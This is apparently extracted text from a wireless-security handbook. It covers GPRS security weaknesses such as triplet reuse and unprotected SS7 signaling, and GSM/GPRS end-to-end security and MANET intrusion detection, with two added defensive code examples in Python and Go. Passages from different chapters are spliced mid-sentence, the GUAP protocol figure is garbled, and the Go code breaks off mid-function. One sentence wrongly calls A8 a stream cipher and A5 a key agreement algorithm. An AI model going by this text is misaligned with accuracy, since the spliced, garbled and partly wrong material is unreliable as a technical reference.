As encryption over the radio interface is optional, the network indicates to the MS whether and which type(s) of encryption it supports in the authentication request message, during the GPRS authentication procedure. If encryption is activated, the MS starts ciphering after sending the authentication response message and the SGSN starts ciphering/deciphering when it receives a valid authentication response message from the MS. However, since these two messages are not protected by confidentiality and integrity mechanisms (data integrity is not provided on the GPRS radio interface except for traditional non-cryptographic link layer checksums), an adversary may mediate in the exchange of authentication messages. The results of this mediation might be either the modification of the network and MS capabilities regarding encryption, or the suppression of encryption over the radio interface.

GPRS Backbone

Based on the analysis of the GPRS security architecture (see the GPRS security architecture section) it can be perceived that GPRS security does not aim at the GPRS backbone and the wire-line connections, but merely at the radio access network and the wireless path. Thus, user data and signaling information conveyed over the GPRS backbone may experience security threats, which degrade the level of security supported by GPRS. In the following, the security weaknesses of the GPRS security architecture that are related to the GPRS backbone network, for both the signaling and the data plane, are presented and analyzed.

Signaling Plane

As mentioned previously, the SS7 technology used for signaling exchange in GPRS does not support security protection. Until recently, this was not perceived to be a problem, since SS7 networks belonged to a small number of large institutions (telecom operators). However, the rapid deployment of mobile systems and the liberalization of
the telecommunication market have dramatically increased the number of operators (for both fixed and mobile networks) that are interconnected through the SS7 technology. This fact provokes a significant threat to GPRS network security, since it increases the probability of an adversary getting access to the network or of a legitimate operator acting maliciously.

The lack of security measures in the SS7 technology used in GPRS also results in the unprotected exchange of signaling messages between a VLR and a VLR/HLR, or a VLR and other fixed network nodes. Although these messages may include critical information for the mobile subscribers and the network's operation, like ciphering keys, authentication data (e.g., authentication triplets), user subscription data (e.g., IMSI), user billing data, network billing data, and so forth, they are conveyed in cleartext within the serving network as well as between the home network and the serving network. For example, the VLR of a serving network may use the IMSI to request authentication data for a single user from its home network, and the latter forwards them to the requesting VLR without any security measure. Thus, the exchanges of signaling messages, which are based on SS7, may disclose sensitive data of mobile subscribers and networks, since they are conveyed over insecure network connections without security precautions.

Data Plane

Similarly to the signaling plane, the data plane of the GPRS backbone presents significant security weaknesses, since the introduction of IP technology in the GPRS core shifts towards open and easily accessible network architectures. In addition, the data encryption mechanism employed in GPRS does not extend far enough towards the core network, also resulting in cleartext transmission of user data in it. Thus, a malicious user who gains access to the network may either obtain access to sensitive data traffic or provide unauthorized/incorrect information to mobile users and network components. As presented previously, the security protection of users' data in the fixed segment of the GPRS network mainly relies on two independent and complementary technologies, which are not undertaken by GPRS but by the network operators. These technologies include: (1) firewalls that enforce security policies on a GPRS core network that belongs to an operator; and (2) pre-configured VPNs that protect specific network connections. However, firewalls were originally conceived to address security issues for fixed networks and thus are not seamlessly applicable in mobile networks. They attempt to protect the cleartext transmitted data in the GPRS backbone from external attacks, but they are inadequate against attacks that originate from malicious mobile subscribers as well as from network operator personnel or any other third party that gets access to the GPRS core network. Another vital issue regarding the deployment of firewalls in GPRS has to do with the consequences of mobility. The mobility of a user may imply roaming between networks and operators, which possibly results in a change of the user address. This fact, in conjunction with the static configuration of firewalls, may potentially lead to discontinuity of service connectivity for the mobile user. Moreover, in some cases the security value of firewalls is considered limited, as they allow direct connection to ports without distinguishing services.

Similarly to firewalls, the VPN technology fails to provide the flexibility required by typical mobile users. Currently, VPNs for GPRS subscribers are established in a static manner between the border gateway of a GPRS network and a remote security gateway of a corporate private network. This fact allows the realization of VPNs only between a security gateway of a large organization and a mobile operator, when a considerable amount of traffic requires protection. Thus, this scheme can provide VPN services neither to individual mobile users that may require on-demand VPN establishment, nor to enterprise users that may roam internationally. In addition, static VPNs have to be reconfigured every time the VPN topology or VPN parameters change.

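The VLR bookkeeping rules for authentication triplets given in the subscriber authentication subsection above, as an added example that is not from the chapter: a small Python model of a serving VLR's triplet store under the strict policy and under the permissive fallback the text warns about, together with the audit check a defender can run over the RAND values issued to one subscriber. The HLR stub, the keyed-hash stand-in for A3/A8, the sample Ki and the IMSI string are constructed assumptions, not real network data or algorithms.

```python
import hashlib
import os
from dataclasses import dataclass


@dataclass(frozen=True)
class Triplet:
    """One GSM/GPRS authentication triplet (RAND, SRES, Kc)."""
    rand: bytes  # 128-bit challenge sent to the MS
    sres: bytes  # 32-bit expected signed response
    kc: bytes    # 64-bit ciphering key for the radio path


def make_triplets(ki, count):
    """Stand-in for the home HLR/AuC: a keyed SHA-256 replaces A3/A8 here
    (a constructed substitute, not COMP128 or any operator algorithm)."""
    triplets = []
    for _ in range(count):
        rand = os.urandom(16)
        digest = hashlib.sha256(ki + rand).digest()
        triplets.append(Triplet(rand, digest[:4], digest[4:12]))
    return triplets


class HlrUnavailable(Exception):
    """The VLR could not obtain fresh triplets (e.g. a signaling failure)."""

class NoFreshTriplet(Exception):
    """Strict policy: authentication refused instead of reusing a triplet."""


def flaky_hlr(ki, fails_after):
    """Constructed HLR stub: serves `fails_after` fetch requests, then
    simulates a system failure on every further request."""
    calls = [0]
    def fetch(imsi, count):
        calls[0] += 1
        if calls[0] > fails_after:
            raise HlrUnavailable(imsi)
        return make_triplets(ki, count)
    return fetch


class VlrTripletStore:
    """Per-IMSI triplet cache of a serving VLR following the text's rules:
    prefer an unmarked triplet, else fetch fresh ones from the home HLR, and
    only if that fails reuse a marked one (allow_reuse=True) or refuse."""

    def __init__(self, fetch_from_hlr, allow_reuse=False, batch=2):
        self.fetch = fetch_from_hlr   # callable(imsi, count) -> [Triplet]
        self.allow_reuse = allow_reuse
        self.batch = batch            # triplets requested per HLR round trip
        self.unmarked = {}            # imsi -> triplets not yet used
        self.marked = {}              # imsi -> triplets already used
        self.events = []              # audit trail of (event, imsi)

    def next_triplet(self, imsi):
        unmarked = self.unmarked.setdefault(imsi, [])
        marked = self.marked.setdefault(imsi, [])
        if not unmarked:
            try:
                unmarked.extend(self.fetch(imsi, self.batch))
                self.events.append(("fetched", imsi))
            except HlrUnavailable:
                if self.allow_reuse and marked:
                    # Weakness: the same RAND and Kc now cover a second session.
                    self.events.append(("reused", imsi))
                    return marked[-1]
                self.events.append(("denied", imsi))
                raise NoFreshTriplet(imsi)
        triplet = unmarked.pop(0)
        marked.append(triplet)        # mark as used once handed out
        return triplet


def run_authentications(store, imsi, attempts):
    """Drive `attempts` authentication rounds and return the RAND issued in
    each, or None where the strict policy refused to authenticate."""
    issued = []
    for _ in range(attempts):
        try:
            issued.append(store.next_triplet(imsi).rand)
        except NoFreshTriplet:
            issued.append(None)
    return issued


def repeated_rands(issued):
    """Defender's audit check: a RAND issued twice to one subscriber means
    a triplet, and with it Kc, was reused."""
    seen, repeats = set(), []
    for rand in issued:
        if rand is None:
            continue
        if rand in seen:
            repeats.append(rand)
        seen.add(rand)
    return repeats
```

With an HLR that answers two fetches and then fails, the permissive store keeps re-issuing the last marked triplet, which the audit check flags, while the strict store refuses the remaining authentications and records them as denied.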

CURRENT RESEARCH ON GPRS SECURITY

The analyzed security weaknesses of the GPRS security architecture increase the risks associated with the usage of GPRS networks, influencing their deployment, which realizes the mobile Internet. In order to defeat some of these risks, a set of security improvements to the existing GPRS security architecture may be incorporated. Additionally, some complementary security measures, which have been originally designed for fixed networks and aim at enhancing the level of security that GPRS supports, may be applied (Xenakis, 2006). In the following, the specific security improvements and the application of the complementary security measures are briefly presented and analyzed.

SIM Card

The majority of the security weaknesses that are related to an MS and the SIM card of a mobile user have to do with the vulnerabilities of COMP128. To address these, the old version of COMP128 (currently named COMP128-1) is replaced by two newer versions, COMP128-2 and COMP128-3, which defeat the known weaknesses. There is an even newer version, COMP128-4, which is based on the 3GPP algorithm MILENAGE that uses the advanced encryption standard (AES). In addition, it is pointed out to GPRS operators that the COMP128 algorithm is only an example algorithm and that every operator should use its own algorithm in order to support an acceptable level of security (Xenakis, 2006).

User Data

User data conveyed over the GPRS backbone and the public Internet most likely remain unprotected (except for the cases in which the operator supports pre-established VPNs over the public Internet) and thus are exposed to various threats. The level of protection that GPRS provides to the data exchanged can be improved by employing two security technologies: (1) the application of end-user security, and (2) the dynamic establishment of mobile IPsec-based VPNs. End-user security is applied by using application layer solutions such as the secure sockets layer (SSL) protocol (Gupta & Gupta, 2001). SSL is the default Internet security protocol that provides point-to-point security by establishing a secure channel on top of TCP. It supports server authentication using certificates, data confidentiality, and message integrity. On the other hand, IPsec protects traffic on a per connection basis and thus is independent from the applications that run above it. An IPsec-based VPN is used for the authentication and the authorization of user access to corporate resources, the establishment of secure tunnels between the communicating parties, and the encapsulation and protection of the data transmitted by the network. On-demand VPNs that are tailored to specific security needs are especially useful for GPRS users, which require any-to-any connectivity in an ad hoc fashion. Regarding the deployment of mobile VPNs over the GPRS infrastructure, three alternative security schemes have been proposed: (1) the end-to-end (Xenakis, Gazis, & Merakos, 2002), (2) the network-wide (Xenakis & Merakos: IEEE Network, 2002), and (3) the border-based (Xenakis & Merakos: IEEE PIMRC, 2002). These schemes mainly differ in the position where the security functionality is placed within the GPRS network architecture (MS, SGSN, and GGSN), and in whether data in transit are ever in cleartext or available to be tapped by outsiders.

Signaling Plane of the GPRS Backbone

The lack of security measures in the signaling plane of the GPRS backbone gives an adversary the opportunity to retrieve critical information such as the permanent identities of mobile users (IMSI), temporary identities (TMSI, TLLI), location information, authentication triplets (RAND, SRES, Kc), charging and billing data, and so forth. The possession of this information enables an attacker to identify a mobile user, to track his/her location, to decipher the user data transferred over the radio interface, to overbill him/her, and so forth. To address this inability of GPRS, it has been proposed
the incorporation of the network domain security (NDS) features (Xenakis, 2006; Xenakis & Merakos, 2004) into the GPRS security architecture. NDS features, which have been designed for a later version of UMTS, ensure that signaling exchanges in the backbone network as well as in the whole wire-line network are protected. For signaling transmission in GPRS the SS7 and IP protocol architectures are employed, which incorporate the mobile application part (MAP) (3GPP TS 09.02, 2004) and the GTP protocol (3GPP TS 09.60, 2002), respectively. In NDS both architectures are designed to be protected by standard procedures based on existing cryptographic techniques. Specifically, the IP-based signaling communications will be protected at the network level by means of the well-known IPsec suite (Kent & Atkinson, 1998). On the other hand, the realization of protection for the SS7-based communications will be accomplished at the application layer by employing specific security protocols (Xenakis & Merakos, 2004). However, until now only the MAP protocol from the SS7 architecture is designed to be protected by a new security protocol named MAPsec (3GPP TS 33.200, 2002).

CONCLUSION

This chapter has presented the security architecture employed in 2.5G mobile systems, focusing on GPRS. This architecture comprises a set of measures that protect the mobile users, the radio access network, the fixed part of the network, and the related data of GPRS. Most of these measures have been originally designed for GSM, but they have been modified to adapt to the packet-oriented traffic nature and the GPRS network components. The operational differences between the application of these measures in GSM and GPRS have been outlined and commented on. In addition, the security measures that can be applied by GPRS operators to protect the GPRS backbone network and inter-network communications, which are based on IP, have been explored. Although GPRS has been designed with security in mind, it presents some essential security weaknesses, which may lead to the realization of security attacks that threaten network operations and data transfer through it. These weaknesses are related to: (1) the compromise of the confidentiality of the subscriber's identity, since it may be conveyed unprotected over the radio interface; (2) the inability of the authentication mechanism to perform network authentication; (3) the possibility of using the COMP128 algorithm (which has been cryptanalyzed) for A3 and A8 implementations; (4) the ability to reuse authentication triplets; (5) the possibility of suppressing encryption over the radio access network or modifying encryption parameters; and (6) the lack of effective security measures that are able to protect signaling and user data transferred over the GPRS backbone network. To defeat some of these risks, a set of security improvements to the existing GPRS security architecture may be incorporated. Additionally, some complementary security measures, which have been originally designed for fixed networks and aim at enhancing the level of security that GPRS supports, may be applied.

ACKNOWLEDGMENT

Work supported by the project CASCADAS (IST-027807) funded by the FET Program of the European Commission.

REFERENCES

3rd Generation Partnership Project (3GPP) TS 03.60 (V7.9.0). (2002). GPRS service description, Stage 2. Sophia Antipolis Cedex, France: Author. Retrieved from ftp://ftp.3gpp.org/specs/2006-12/R1998/03_series

3rd Generation Partnership Project (3GPP) TS 09.60 (V7.10.0). (2002). GPRS tunneling protocol (GTP) across the Gn and Gp interface. Sophia Antipolis Cedex, France: Author. Retrieved from ftp://ftp.3gpp.org/specs/2006-12/R1998/09_series

3rd Generation Partnership Project (3GPP) TS 03.03 (v7.8.0). (2003). Numbering, addressing and identification. Sophia Antipolis Cedex, France: Author. Retrieved from ftp://ftp.3gpp.org/specs/2006-12/R1998/03_series

3rd Generation Partnership Project (3GPP) TS 01.61 (v7.0.0). (2001). GPRS ciphering algorithm requirements. Sophia Antipolis Cedex, France: Author. Retrieved from ftp://ftp.3gpp.org/specs/2006-12/R1999/01_series

3rd Generation Partnership Project (3GPP) TS 09.02 (v7.15.0). (2004). Mobile application part (MAP) specification. Sophia Antipolis Cedex, France: Author. Retrieved from ftp://ftp.3gpp.org/specs/2006-12/R1998/09_series

3rd Generation Partnership Project (3GPP) TS 33.200 (v4.3.0). (2002). 3G security; network domain security; MAP application layer security. Sophia Antipolis Cedex, France: Author. Retrieved from ftp://ftp.3gpp.org/specs/2006-12/Rel-4/33_series

Barkan, E., Biham, E., & Neller, N. (2003). Instant ciphertext-only cryptanalysis of GSM encrypted communication. In Proceedings of Advances in Cryptology (CRYPTO 2003) (LNCS 2729, pp. 600-616).

ETSI TS 100 922 (v7.1.1). (1999). Subscriber identity modules (SIM) functional characteristics. Retrieved from http://pda.etsi.org/pda/queryform.asp

Gleeson, B., Lin, A., Heinanen, J., Armitage, G., & Malis, A. (2000). A framework for IP based virtual private networks (RFC 2764). Retrieved from http://www.faqs.org/rfcs/rfc2764.html

GSM 03.20. (1999). Security related network functions. Retrieved from ftp://ftp.3gpp.org/specs/2006-12/R1999/03_series

Gupta, V., & Gupta, S. (2001). Securing the wireless Internet. IEEE Communications Magazine, 93(12), 68-74.

Kent, S., & Atkinson, R. (1998). Security architecture for the Internet protocol (RFC 2401). Retrieved from http://www.javvin.com/protocol/rfc2401.pdf

Mitchell, C. (2001). The security of the GSM air interface protocol. Retrieved August, 2001, from http://www.ma.rhul.ac.uk/techreports/

Pagliusi, P. (2002). A contemporary foreword on GSM security. In Proceedings of the Infrastructure Security International Conference (InfraSec) (LNCS 2437, pp. 129-144). Springer-Verlag.

Srisuresh, P., & Holdrege, M. (1999). IP network address translator (NAT) terminology and considerations (RFC 2663). Retrieved from http://www.faqs.org/rfcs/rfc2663.html

Xenakis, C. (2006). Malicious actions against the GPRS technology. Journal in Computer Virology, 2(2), 121-133.

Xenakis, C., Gazis, E., & Merakos, L. (2002). Secure VPN deployment in GPRS mobile network. In Proceedings of European Wireless, Florence, Italy (pp. 293-300).

Xenakis, C., & Merakos, L. (2002). On demand network-wide VPN deployment in GPRS. IEEE Network, 16(6), 28-37.

Xenakis, C., & Merakos, L. (2002). Dynamic network-based secure VPN deployment in GPRS. In Proceedings of IEEE PIMRC, Lisboa, Portugal (pp. 1260-1266).

Xenakis, C., & Merakos, L. (2004). Security in third generation mobile networks. Computer Communications, 27(7), 638-650.

KEY TERMS

General Packet Radio Service (GPRS): GPRS is a mobile data service available to users of GSM.

Global System for Mobile Communications (GSM): GSM is the most popular standard for mobile phones in the world.

GPRS Tunneling Protocol (GTP): GTP is an IP-based protocol that carries signaling and user data within the GPRS core network.

International Mobile Subscriber Identity (IMSI): IMSI is a unique number associated with all GSM network mobile phone users.

Second Generation (2G): 2G is short for second-generation wireless telephone technology.

Second and a Half Generation (2.5G): 2.5G is used to describe 2G systems that have implemented a packet-switched domain in addition to the circuit-switched domain.

Signaling System 7 (SS7): SS7 is a set of telephony signaling protocols which are used to set up the vast majority of the world's public switched telephone network telephone calls.

Subscriber Identity Module (SIM): SIM is a removable smart card for mobile phones that stores network-specific information used to authenticate and identify subscribers on the network.

Temporary Mobile Subscriber Identity (TMSI): TMSI is a randomly allocated number that is given to the mobile the moment it is switched on and serves as a temporary identity between the mobile and the network.




Chapter XXIII
End-to-End Security
Comparisons Between IEEE
802.16e and 3G Technologies
Sasan Adibi
University of Waterloo, Canada

Gordon B. Agnew
University of Waterloo, Canada

AbstrAct

Security measures of mobile infrastructures have always been important from the early days of the
creation of cellular networks. Nowadays, however, the traditional security schemes require a more
fundamental approach to cover the entire path from the mobile user to the server. This fundamental ap-
proach is so-called end-to-end (E2E) security coverage. The main focus of this chapter is to discuss such
architectures for IEEE 802.16e (Mobile-WiMAX) and major third generation (3G) cellular networks.
The E2E implementations usually contain a complete set of algorithms, protocol enhancements (mutual
identification, authentications, and authorization), including the very large-scale
implementations. This chapter discusses various proposals at the protocol level.

INTRODUCTION

Mobile-WiMAX (802.16e) is a fourth generation (4G) candidate for mobility and is expected to address many of the current issues we face in 3G technologies. The E2E security scheme is one of the major issues, which is currently addressed in a variety of forms using IP security (IPsec), secure socket layer (SSL)/transport layer security (TLS), OpenPGP, and S/MIME (Gallop, 2005). The E2E architectures of major 3G technologies including global system for mobile communications (GSM), general packet radio service (GPRS), and code division multiple access (CDMA) and 802.16e will be discussed in this chapter.

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.
End-to-End Security Comparisons Between IEEE 802.16e and 3G Technologies

The management of the sections is as follows: the next section will discuss details about the ultimate security features attributed to 3G technologies. The GSM section will discuss the security weakness in GSM's initial draft and the E2E solution to overcome its weakness. The fourth and fifth sections talk about GPRS and CDMA respectively. The Mobile-WiMAX section opens the discussion on 802.16e, the candidate for the 4G wireless systems, which contains the security weakness of 802.16e's initial draft and the E2E solution. A thorough comparison and references will be given in the last two sections.

OBJECTIVES OF SECURITY FEATURES FOR 3G/MOBILE-WIMAX

Before discussing security weaknesses of individual 3G technologies, we briefly discuss the objectives of 3G security features. These features are (Campbell, Mckunas, Myagmar, Gupta, & Briley, 2002):

• Mutual authentication: Authentication is a method to verify that the claimed identity of an entity is genuine. Authentication is a fundamental security service and other necessary services often depend on proper authentication. Many protocols offer a one-way authentication. That is, only the client has to authenticate itself to the server and the server is not required to authenticate itself to the client. A one-way authentication is prone to a so-called impersonation attack, in which an illegitimate entity could pose as a legitimate one and start a new communication with another legitimate entity or take control of an already started conversation. A two-way authentication scheme (mutual authentication) resolves the impersonation attack. An E2E security scheme uses a balanced mutual authentication technique. A balanced technique requires equal effort by both entities to authenticate themselves to other entities. This decreases the chance of the attacker's success.
• Data integrity: This guarantees that the data received has not been altered by an unauthorized entity. One method of doing this is through the application of a hash function to the data stream.
• Security between networks: Networks are interconnected using secure wired links, mainly using the IPSec tunneling mechanism.
• Secure international mobile subscriber identity (IMSI) usage: The first-time user is assigned an initial IMSI number by the home network.
• Stronger security scope: Security is based within the radio network controller (RNC) rather than the base station (BS). An RNC is responsible for controlling and managing the multiple BSs, including the utilization of radio network services.
• User- and mobile-station authentication schemes: Both user and mobile station share a secret common key, which is called the PIN. This is used for authentication.
• Secure services: These services protect the infrastructure against usage and access misuses.
• Security in applications: This is critical for mobile-based application security.
• Fraud detection: Mechanisms to detect and combat fraud in roaming situations.
• Flexibility: As technologies evolve, security features are extended and enhanced as required by new services and threats.
• Service availability and configurability: Users are to be notified whether security is on and the available level of security.
• Multiple cipher and integrity algorithms: The mobile user and the network negotiate and agree on the best available cipher and integrity algorithms (e.g., KASUMI).
• Lawful interception: Mechanisms should be provided to authorize agencies with certain necessary information about subscribers.
• GSM compatibility: GSM subscribers should be able to roam in 3G networks and cope with the extended security needed via the GSM security context.

Figure 1. GSM system overview (Adapted from Pagliusi, 2002)

Figure 2. GSM authentication, cipher key generation, and encryption (Adapted from Pagliusi, 2002)

Figure 3. Authentication and encryption in GSM system (Adapted from Pagliusi, 2002)

GSM

In this section, the weaknesses associated with GSM security systems (Pagliusi, 2002) are discussed and the E2E security proposals are considered.

GSM Security Features

Figure 1 shows the GSM system overview. The principles behind the GSM security scheme are:
• Subscriber identity confidentiality scheme;
• Subscriber identity authentication scheme (Figure 2);
• Stream ciphering of user traffic and user-related control data schemes; and
• Using the subscriber identity module (SIM) as a security module scheme.

Figure 2 shows the GSM authentication scheme, in which three algorithms (A3, A5, and A8) are used for authentication, key generation, and encryption. The detailed authentication and encryption schemes for GSM are shown in Figure 3, where A3 (authentication algorithm), A8 (stream cipher), and A5 (key agreement algorithm) are performed in the mobile station and the key is verified in the public land mobile network (PLMN).

GSM Security Attacks

The security attacks associated with the GSM architecture are (Pagliusi, 2002):

• SIM/Mobile Equipment (ME) interface: The SIM/ME interface is unprotected and can be tapped using an unauthorized device.
• Attacks on the algorithms A3/A8/(A5/1): Both A3 and A8 rely heavily on the COMP128 authentication algorithm, which has been cryptanalyzed, allowing the recovery of the shared master key and leading to device cloning. A5/1 has also been attacked by Biryukov and Shamir (Pagliusi, 2002).
• One-way authentication: A3 is a one-way operator-dependent stream-cipher function. Therefore its functionality suffers from being unbalanced.
• Unprotected signaling: Though nearly all communications between the MS and the BS are encrypted, in the fixed networks and between GSM central networks the communications and signaling are not protected, as they are in plaintext most of the time.
• Attack on SIM card: Interruption could occur in the operation of the smart card's microprocessor by exposing it to an electronic camera flashbulb. These types of attacks are called optical fault induction. Another type of attack, which is performed on the execution of COMP128 table lookups, is called a partitioning attack.
• False BS: GSM provides a unilateral (one-way) authentication. Because of this unbalanced nature, it allows attacks (such as the man-in-the-middle (MITM) attack) where a malicious third party masquerades as a BS to one or more mobile stations.

E2E Scheme for GSM

The security concerns for GSM could be addressed in an E2E fashion. There are two major concerns in the current GSM structure that prevent E2E communication: one is the fact that authentication is one way (A3/A8), and the other is the fact that data is exposed and unprotected in certain areas. To prevent these flaws and pave the path to go E2E, strong user authentication along with complete path encryption are proposed (Aydemir & Selcuk, 2005; Mynttinen, 2000).

Strong User Authentication

A strong authentication protocol is achieved through a user-based rather than a device-based approach. The GSM authentication algorithm involves three fundamental entities in a session (Pagliusi, 2002):

• The mobile subscriber (MS)
• The visiting location register (VLR)
• The home location register (HLR)

The initial draft of GSM specifies that the authentication scheme uses a cryptographic authentication key embedded in the SIM card of the device. Through the GSM user authentication protocol (GUAP) approach (Aydemir & Selcuk, 2005), the user can authenticate himself/herself through a password instead of the embedded hard-coded key, which breaks the dependency on the SIM card during authentication. The GUAP is based on three entities, and in many cases the third entity is a trusted server whose public key is known by
Figure4.TheGUAPscheme(AdaptedfromAydemir&Selcuk,205)

1. MSWVLR:IMSI
2. VLRWMS:RAND
3. MSWVLR: {n1, n2, n3, {RAND}Π }K HLR, ra
4. VLRWHLR: {n1, n2, n3, {RAND}Π }K HLR, {RAND} KVLR
5. HLRWVLR: {k} KVLR , {n1, n2 ⊕ k}Π
6. VLRWMS: {n1, n2 ⊕ k}Π, {ra}k, rb
7. MSWVLR: {rb}k

GSM doesn't include synchronized clocks; therefore, authentication timestamps are not allowed. This can be remedied through the usage of random nonces. According to Figure 4, through the VLR, the MS is authenticated to the HLR through the usage of the password. The HLR public key, K_HLR, is known to all parties, and K_VLR is the symmetric encryption key shared between the VLR and the HLR. The GUAP protocol is depicted in Figure 4.

In regards to GSM authentication, the GUAP's main goal is to break the SIM card's dependency for added user flexibility. The GUAP's design includes considerations of the MS's computational restrictions. It also includes provisioning of the VLR authentication to both MS and HLR.

E2E Security of Mobile Data in GSM

In this approach, the E2E security scheme of mobile data in GSM is considered. It focuses on wireless application protocol (WAP) security, which can be broken. The data path protection in WAP is especially important for voice over IP (VoIP) applications. For this purpose, WAP Transport Layer E2E Security is proposed. The E2E security for the WAP transport layer is a specification provided by the WAP Forum for supporting WAP E2E security by allowing the WAP clients to establish a direct wireless transport layer security (WTLS) connection with the WAP-based gateway. This gateway no longer encrypts and decrypts the traffic meant for the content provider's 3rd party. Thus a malicious node is not able to cause problems for the data's confidentiality and integrity. A mechanism such as TLS can be used to provide the required protection. Therefore it is fair to say that the required confidentiality and integrity can be guaranteed. However, the non-repudiation property cannot be achieved using this solution. To remedy this problem, a digital signature can be used in the transaction data, which is able to support integrity and non-repudiation functions. All WAP clients need to have access to digital keys for this to work.

GPRS

GPRS is a data-network-based architecture, which is designed in such a way as to integrate well with existing GSM, offering MSs "always connected" packet-switched data services. This includes connections to corporate networks and to the Internet. Figure 5 shows an MS logically attached to a serving GPRS support node (SGSN) ("GPRS Security Threats and Solutions," 2002). The SGSN's main functionality is to provide data services to the MS. Through the GPRS tunneling protocol (GTP), the SGSN can logically be connected to the gateway GPRS support node (GGSN). The GTP provides a logical connection among the roaming partners of SGSN and GGSN.

GPRS was introduced as a packet service, which provides E2E IP connectivity with similar security options as in GSM. GPRS uses the same A3/A8 algorithms as GSM, but the randomization function is slightly different. The three GPRS encryption algorithms are GEA1, GEA2, and GEA3, which is A5/3.



Figure 5. GPRS architecture (Adapted from "GPRS Security Threats and Solutions," 2002)

GPRS Classifications of Security Services

Security services provided by GPRS are protections against attacks, providing the following assurances:

• Integrity: Integrity is an assurance that data is not altered in an unauthorized manner.
• Confidentiality: Confidentiality is protecting data from disclosure to third parties.
• Authentication: Authentication provides assurance that all communication parties are really the ones who they claim to be.
• Authorization: Authorization is a service which ensures that only legitimate entities are allowed to take part in any communications.
• Availability: Availability means that communication parties and data services are available and usable by any other parties in wireless range.

Data Services Offered on the Gp and Gi Interfaces

Before one can discuss the details about security, it is necessary to discuss the entities related to the data path. There are two main interfaces used in GPRS: Gp and Gi. The Gp interface is a logical connection among PLMNs. The protocols that deal directly with Gp are:

• GTP: The logical connection among the roaming partners of SGSN and GGSN.
• Border gateway protocol (BGP): BGP provides routing between interfaces.
• Domain name system (DNS): DNS is a service that translates Internet domain names and computer hostnames to IP addresses.

The GTP provides a logical connection among the roaming partners of SGSN and GGSN. If this connection is within the same PLMN, it is called the Gn interface. If the connection is between two different PLMNs, then it is known as the Gp interface. The Gp and the Gi interfaces are the initial and fundamental points of interconnection


Security in Mobile Ad Hoc Networks

cal architecture may not be suitable to MANETs either, due to the rapid topology change of MANETs and the high overhead introduced by organizing the hierarchy.

Sun, Wu, and Pooch (2003) propose a zone-based IDS (ZBIDS). ZBIDS divides the network into nonoverlapping zones. The nodes are categorized into two types based on their locations relative to a zone: intrazone nodes (within a zone and not connected to nodes in another zone) and interzone nodes (within a zone and connected to nodes in another zone). Intrazone nodes are responsible for local detection and broadcast in case of alerts. Interzone nodes perform aggregation and correlation of these local detection results. The system can limit the detection cooperation to a zone, which may reduce the overhead of the broadcast and aggregation. However, the system requires that each node know its physical location, which needs prior design setup. The management of zones is not a trivial task either.

Intrusion detection has been a challenging task for MANETs, mainly due to the distributed nature and resource constraints of ad hoc networks. To determine intrusions with local or incomplete information and with low overhead has been a major concern for researchers.

OPEN CHALLENGES AND CONCLUSION

Challenges

The research in MANET security is still in its early stage. Some areas that are interesting but little explored include accounting, trust management, authentication, and key management.

Accounting provides the method for collecting the information used for billing, auditing, and reporting. Accounting mechanisms can track the services that users are accessing as well as the amount of network resources they are consuming. Accounting is a challenging problem due to the distributed and ephemeral nature of MANETs.

The characteristics of MANETs also bring difficulty to trust management. In MANETs, the trustworthiness is evaluated based on the information or evidence provided by peers, not by trusted authorities or a central administration point (as in the Internet or wireless networks with base stations). Additionally, the gathering of the trust evidence may be difficult due to the small bandwidth, and therefore local information has to be relied on. Evaluation with uncertain and incomplete trust evidence certainly poses challenges to trust management.

Research progress has been made on authentication and key management. But finding cryptographic mechanisms that consume less computational resources and impose lower time complexity is still a major research concern in MANET security.

Another problem for MANET security is to find an effective and efficient approach for intrusion response. Many publications simply mention that proper actions should be taken to react to intrusions, which may include alarming the other nodes in the network, isolating the compromised nodes, or re-establishing the trust relationship for the entire network. But the problem of how to locate and then isolate the compromised nodes is not discussed in detail. The location and isolation could be even more difficult when distributed attacks are launched from multiple sources. Eliminating the compromised nodes by rekeying or rebuilding the trust could be an effective solution. However, it is certainly not efficient taking into account the computation and communication overhead it may cause.

Some other unexplored research problems include the tradeoff between privacy (such as identity anonymity and location privacy) and other security services (such as accounting and intrusion detection), and the tradeoff between security strengths and network performance.

Yang et al. (2004) argue that MANET security needs a "multifence security solution," namely resiliency-oriented security design. They argue that the existing proposals are attack-oriented because the protocols target some specific attack that has been identified first. These protocols therefore may not work well in the presence of unanticipated attacks. They propose that a security solution is needed that can be embedded into every component or every layer in the network.
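The zone-based aggregation described for ZBIDS earlier in this section, as an added example that is not part of the chapter or of Sun, Wu, and Pooch's system. It models the interzone (gateway) node of one zone: it discards alerts that come from other zones, which is how the cooperation is limited to a zone, it counts distinct intrazone reporters per suspect so that one node repeating itself adds no weight, and it confirms a suspect once a quorum of reporters agrees. The Alert record, the quorum rule, the ZoneAggregator type with its Receive, Confirmed and Dropped methods, and the alert trace in SampleAlerts are all constructed for this example and are not part of ZBIDS.

```go
package main

import (
	"fmt"
	"sort"
)

// Alert is what an intrazone node broadcasts after a local detection (constructed
// record; ZBIDS fixes no wire format): who reports, who is suspected, from which zone.
type Alert struct {
	Reporter, Suspect string
	Zone              int
}

// ZoneAggregator is the correlation logic of one zone's interzone node. It ignores
// alerts from other zones (detection cooperation stays inside the zone) and counts
// distinct reporters per suspect, so a single noisy node cannot confirm an intrusion
// by itself. The quorum rule is an assumption of this example, not part of ZBIDS.
type ZoneAggregator struct {
	Zone      int
	Quorum    int                        // distinct reporters needed to confirm a suspect
	reporters map[string]map[string]bool // suspect -> set of reporters
	dropped   int                        // alerts discarded because they came from another zone
}

func NewZoneAggregator(zone, quorum int) *ZoneAggregator {
	return &ZoneAggregator{Zone: zone, Quorum: quorum, reporters: map[string]map[string]bool{}}
}

// Receive records one local alert; repeats from the same reporter add no weight.
func (z *ZoneAggregator) Receive(a Alert) {
	if a.Zone != z.Zone {
		z.dropped++
		return
	}
	if z.reporters[a.Suspect] == nil {
		z.reporters[a.Suspect] = map[string]bool{}
	}
	z.reporters[a.Suspect][a.Reporter] = true
}

// Confirmed lists the suspects reported by at least Quorum distinct intrazone nodes.
func (z *ZoneAggregator) Confirmed() []string {
	var out []string
	for suspect, set := range z.reporters {
		if len(set) >= z.Quorum {
			out = append(out, suspect)
		}
	}
	sort.Strings(out) // map iteration order is random; sort for deterministic output
	return out
}

// Dropped reports how many out-of-zone alerts were ignored.
func (z *ZoneAggregator) Dropped() int { return z.dropped }

// SampleAlerts is a constructed trace: three distinct zone-1 nodes flag X, node N4
// flags Y three times on its own, and a zone-2 node flags Z.
func SampleAlerts() []Alert {
	return []Alert{
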